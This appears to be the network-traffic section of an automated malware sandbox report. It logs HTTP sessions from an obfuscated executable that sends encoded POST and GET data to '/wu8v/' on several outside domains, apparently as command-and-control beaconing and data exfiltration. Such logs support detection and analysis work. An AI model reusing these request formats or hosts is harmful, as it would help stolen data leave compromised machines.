                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-/W3C/DTD HTML 4.01 Transitional/EN"><html><head><title>Nom de domaine www.btpbox.com</title><link href="https://parked.reg.bookmyname.com/styles/styles-redir.css" rel="stylesheet" type="text/css"><meta name="description" content="Nom de domaine enregistr via le bureau d'enregistrement https://www.bookmyname.com, registrar, noms de domaine"><meta name="keywords" content="parking, protection, renouveler, rserv, redirection mail, protg, serveurs DNS, enregistrer, deposer, verifier, disponible, rserv, nom de domaine, domaine XXX, domaine COM, domaine NET, domaine IN, domaine CH, domaine BE, domaine CC, domaine XXX, domaine NET, domaine RE, "><META NAME="Domain" CONTENT="parked"><META NAME="Domaine" CONTENT="parque"><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-15"></head><body><div id="main"> <div id="header"> <div id="logo"><a href="https://www.bookmyname.com/"><img src="https://parked.reg.bookmyname.com/images/logo_book.gif [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49779 | 213.36.252.182 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 14:07:53.370606899 CEST | 453 | OUT | GET /wu8v/?MdtlcTm=HNLEVoSmZQxFSmctMpTTd4dyTFjeIBcvYbInUpVYO5VLbn2V1MEgIHD38EU48JsuuCIVw/TFvn9kkkg/Sq9Xy2f3I5Wlm16rLCQIpVyEpLVAPUkeiuBH2KE=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.btpbox.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:07:53.674268961 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                    Date: Wed, 08 May 2024 12:07:53 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                    Content-Length: 5056
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-/W3C/DTD HTML 4.01 Transitional/EN"><html><head><title>Nom de domaine www.btpbox.com</title><link href="https://parked.reg.bookmyname.com/styles/styles-redir.css" rel="stylesheet" type="text/css"><meta name="description" content="Nom de domaine enregistr via le bureau d'enregistrement https://www.bookmyname.com, registrar, noms de domaine"><meta name="keywords" content="deposer, rserv, protger, deposer, renouvellement, hbergement, grer, renouvellement, domaine parqu, transfrer, verifier, vente, nom de domaine, domaine IN, domaine UK, domaine COM, domaine CC, domaine CC, domaine IM, domaine NET, domaine FR, domaine BIZ, domaine UK, "><META NAME="Domain" CONTENT="parked"><META NAME="Domaine" CONTENT="parque"><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-15"></head><body><div id="main"> <div id="header"> <div id="logo"><a href="https://www.bookmyname.com/"><img src="https://parked.reg.bookmyname.com/images/logo_book.gif" al [TRUNCATED]
                                                                                                                    May 8, 2024 14:07:53.674295902 CEST | 1289 | IN
                                                                                                                    Data Ascii: ine, discount" border="0" height="58" width="180"></a></div> <div id="banniere"><a href="https://www.bookmyname.com/nom_de_domaine/tarif_nom_de_domaine.html"><img src="https://parked.reg.bookmyname.com/images/fr_banniere_haut.jpg" alt=
                                                                                                                    May 8, 2024 14:07:53.674312115 CEST | 1289 | IN
                                                                                                                    Data Ascii: br>&nbsp;<br>Le nom de domaine a t enregistr par un utilisateur du registrar <a href='https://www.bookmyname.com/'>BookMyName</a> et est rserv pour une utilisation future.<br>&nbsp;<br><a href='https://www.bookmyname.com/whois_informat
                                                                                                                    May 8, 2024 14:07:53.674331903 CEST | 1289 | IN
                                                                                                                    Data Ascii: a href="http://www.bookmyname.com/"><img src="http://parked.reg.bookmyname.com/images/lien_3.gif" alt="com" border="0" height="28" width="38"></a><a href="http://www.pir.org/" onclick="window.open(this.href); return false;"><img src="http://p
                                                                                                                    May 8, 2024 14:07:53.674350023 CEST | 154 | IN
                                                                                                                    Data Ascii: alse;"><img src="http://parked.reg.bookmyname.com/images/lien_4.gif" alt="icann" border="0" height="28" width="30"></a></div>--></div></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    37 | 192.168.2.4 | 49780 | 70.32.23.111 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:07:59.281984091 CEST | 709 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.glissy.ca
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.glissy.ca
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.glissy.ca/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=7GM/gPrpLhIr9i49QGingdTsDneRi+RzcMv0vC3nv5wGMeDNNr7CeXvLy3yFhcWF2vhqUX2+j2SWZqMEko0hMejGp1Nkg3ZzcqWPpmeqmZycltyyNKrclZqocUMyNwUJTtrK3f1uPQr5Vs11TDD8duRRzdyBh49llxh8+ABQGW3D2eaE89KKRDqxEWJ+wDDXHQ==
                                                                                                                    May 8, 2024 14:07:59.501718998 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                    Date: Wed, 08 May 2024 12:07:59 GMT
                                                                                                                    Content-Length: 1489
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                    Server: imunify360-webshield/1.21
                                                                                                                    Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta name="robots" content="noindex, nofollow"> <title>One moment, please...</title> <style> body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center; } </style> </head><body> <h1>Please wait while your request is being verified...</h1> <form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="GET"> <input type="hidden" id="wsidchk" name="wsidchk"/> </form> <script> (function(){ var west=+((+!+[])+(+!+[]+[])+(+!+[]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+![]+[])), east=+((+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![])+(+!+[] [TRUNCATED]
                                                                                                                    May 8, 2024 14:07:59.501729965 CEST | 431 | IN
                                                                                                                    Data Ascii: x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener('DOMContentLoaded',y,z) : document.attachEvent('onreadystatechange',y);}; y(function(){


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    38 | 192.168.2.4 | 49781 | 70.32.23.111 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:08:02.675647974 CEST | 729 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.glissy.ca
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.glissy.ca
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.glissy.ca/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=7GM/gPrpLhIr8CI9Th+nxtTjJHeRoeRvcMr0vAb3vrUGM8LNKojCZXvLqnzOlcWO2vsXUVi+j1uWZvgEk7Mme+jE8lNm+HZzcqWPpi+Mmfacl8Cyf+Hbo5qrbUMyJwVCTtrs3epUPST5Vsl1TXf/GeRTttztlo879kUdzx81GlDy+4LetMrdDDOCZRAK9A+eca3Y3NhU/ybbK+yMqyOv+ZQ=
                                                                                                                    May 8, 2024 14:08:02.896075964 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                    Date: Wed, 08 May 2024 12:08:02 GMT
                                                                                                                    Content-Length: 1535
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                    Server: imunify360-webshield/1.21
                                                                                                                    Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta name="robots" content="noindex, nofollow"> <title>One moment, please...</title> <style> body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center; } </style> </head><body> <h1>Please wait while your request is being verified...</h1> <form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="GET"> <input type="hidden" id="wsidchk" name="wsidchk"/> </form> <script> (function(){ var west=+((+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+![])+(+!+[]+[])+(+!+[])), east=+((+!+[])+(+!+[]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[] [TRUNCATED]
                                                                                                                    May 8, 2024 14:08:02.896090984 CEST | 477 | IN
                                                                                                                    Data Ascii: +!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+[])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener('DOMContentLoaded',y,z) : document.attachEvent('on


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    39 | 192.168.2.4 | 49782 | 70.32.23.111 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:08:05.419578075 CEST | 10811 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.glissy.ca
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.glissy.ca
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.glissy.ca/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=7GM/gPrpLhIr8CI9Th+nxtTjJHeRoeRvcMr0vAb3vrcGNJHNMJjCYXvLjHzNlcWf2v1cUV/cjzqWYJ0Ex6MmHOjEkVNlg3ZqcuyLpmSMmfacl+ayI6rb7pqocUMuNwVqTtzS3e9+Oiz5WNV1Wk3/buRVstz1lowa9iw3zxZeGiry9+rH1vXNAxLcETQP5SCSdN764PpOpyLNRJHG/g2KoZX6v5GCN81L7lQrzGL8hnst8Q0gX/Q27VeDJIyo9U9RwBv00un+Bxs7Uk57QxklZVkA5Po+7WEYeWdXDVIc1za9Y2Gx12q1pZuqTHKNXiMeg+99YmXLHqDwokaPOFwnlYqynrbN4yonrbb4WD/HXFBe/HZPC0ML5EFYkUDvkCIBuIklao/Q/dVCie3EKO3ffdeHjLQ1Hz5jMNm2o6G3gqsBfKPpLrS1WSNl2XnmqgldWts7X+6fQEQUjnvgm2TxkPDP2nJ2+WHy8SMAG+8rx05jeeQrHFA14fE4uBOLRIlZ55jD5wAOkgyzAdBn812tVdtKc2XgF0tEkmK5FHXyXOVrAHA/Bz+e7iDUml5dFYBErNy2k1f5WhbIl30DDY2lKyiFFb9TX0or+aSqMyWivWfK/Mkpgvs4ar0H5LH1OWS508L4wxbJTpMZ1XwBszSvOyRj+/EmcdJSaU0wDoYdIw9msX6vE5Bp3FfBUzUCSkXeLIa1CTLnCvTafr1GrNhlpnd/oV2/i9MpC96oxKGoMg1ZZe/AoBGGMPoY2iZiUsjZ7Q3K0fGBzaAA9TrHJbDuJQFWIf56uK0lok6836zVEPHwKrySilC+zLI6YLNUUzapNS+LxciKsVWHzzWzm1h5K4LIz9mljMlyl6i9VPzhTg+3te/au/dXRp81fF0WDos1sd9TwuwuqKa1kaCXLo3W8dhKzcIW1wZjBe5KonCXhyxnhxIVt7Unn4Fq/5HLFu0RP39G6FtL4YH8v0M5jECzQ8VNgT05ISe/FPrqsj7EhFbp [TRUNCATED]
                                                                                                                    May 8, 2024 14:08:05.639544010 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                    Date: Wed, 08 May 2024 12:08:05 GMT
                                                                                                                    Content-Length: 1489
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                    Server: imunify360-webshield/1.21
                                                                                                                    Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta name="robots" content="noindex, nofollow"> <title>One moment, please...</title> <style> body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center; } </style> </head><body> <h1>Please wait while your request is being verified...</h1> <form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="GET"> <input type="hidden" id="wsidchk" name="wsidchk"/> </form> <script> (function(){ var west=+((+!+[]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![])+(+!+[]+!![]+!![]+!![]+[])+(+![])), east=+((+!+[]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!! [TRUNCATED]
                                                                                                                    May 8, 2024 14:08:05.639559031 CEST | 431 | IN
                                                                                                                    Data Ascii: x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener('DOMContentLoaded',y,z) : document.attachEvent('onreadystatechange',y);}; y(function(){


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    40 | 192.168.2.4 | 49783 | 70.32.23.111 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:08:08.168732882 CEST | 452 | OUT | GET /wu8v/?MdtlcTm=2Ekfj6jdIBk36xhcbV2ym43lHRKg6LV7IJvggRD/yKlDT5fLDaqmfwfg0kC4k4WA5tpgDGvB1m7jQvkf/ooPPLzV8n4D4xVHdcGXqhGJgd2fmMm1GJzEmqU=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.glissy.ca
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
May 8, 2024 14:08:08.388655901 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                    Date: Wed, 08 May 2024 12:08:08 GMT
                                                                                                                    Content-Length: 1570
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    Cache-Control: no-store, max-age=0
                                                                                                                    Server: imunify360-webshield/1.21
                                                                                                                    Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta name="robots" content="noindex, nofollow"> <title>One moment, please...</title> <style> body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center; } </style> </head><body> <h1>Please wait while your request is being verified...</h1> <form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="GET"> <input type="hidden" id="wsidchk" name="wsidchk"/> </form> <script> (function(){ var west=+((+!+[])+(+!+[]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+![]+[])+(+!+[]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+[])), east=+((+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!! [TRUNCATED]
May 8, 2024 14:08:08.388670921 CEST | 512 | IN | Data Raw: 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20
                                                                                                                    Data Ascii: []+!![]+!![]+!![])+(+!+[]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener('DOMContentLoad


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49784 | 62.149.128.40 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 14:08:14.370158911 CEST | 724 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.insertcoen.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.insertcoen.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.insertcoen.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=uXEjkQ3q0ZXw1jt4Qn3XHtC2Ra8G3/MBhbrh/PhcLgPvpnke4WpaHpaakAeby2Ze/07PmtkIcTxuvu9xJGSn5IXT235s7a6tkI1P2uMBgYSI6CKBgfJJhfdMYJMvDaRDCIPLx49tvI7+6Thl6wsbrqimlDiWyGXHMuHLok992GoO1ZIcfaTHX5khZQ2s5wh5kA==
May 8, 2024 14:08:14.701770067 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Cache-Control: private
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Wed, 08 May 2024 12:08:14 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 4947
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0; [TRUNCATED]
May 8, 2024 14:08:14.701783895 CEST | 1289 | IN | Data Raw: 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30
                                                                                                                    Data Ascii: :#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;}
May 8, 2024 14:08:14.701795101 CEST | 1289 | IN | Data Raw: 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 20 0a 3c 64 69 76
                                                                                                                    Data Ascii: :#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is tempor
May 8, 2024 14:08:14.701807022 CEST | 1289 | IN | Data Raw: 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52 65 71 75 65 73 74 48 61 6e 64 6c
                                                                                                                    Data Ascii: Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td></t
May 8, 2024 14:08:15.035562038 CEST | 9 | IN | Data Raw: 3c 2f 68 74 6d 6c 3e 20 0a
                                                                                                                    Data Ascii: </html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 49785 | 62.149.128.40 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 14:08:17.238390923 CEST | 744 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.insertcoen.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.insertcoen.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.insertcoen.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=uXEjkQ3q0ZXw3D94DHLXGNC1NK8G9fNKhb3h/O1qKSrvpCYe7UBaGpaaxweCsGZJ/0ntmpgIcSRuvvtxJ1qo4YXR7X5y166tkI1P2uYngYaI6y6Bh+JOr/dPQpMvHaRPCIP1x9VXvN/+6Xll6iUY86ig7zjAilGSUO+BwFZN+XgM0fZGOryQF5ASEX/Y0zcw/J1JwHIhsO53Svdd35Q7kvM=
May 8, 2024 14:08:17.568908930 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Cache-Control: private
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Wed, 08 May 2024 12:08:17 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 4947
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0; [TRUNCATED]
May 8, 2024 14:08:17.568928003 CEST | 1289 | IN | Data Raw: 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30
                                                                                                                    Data Ascii: :#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;}
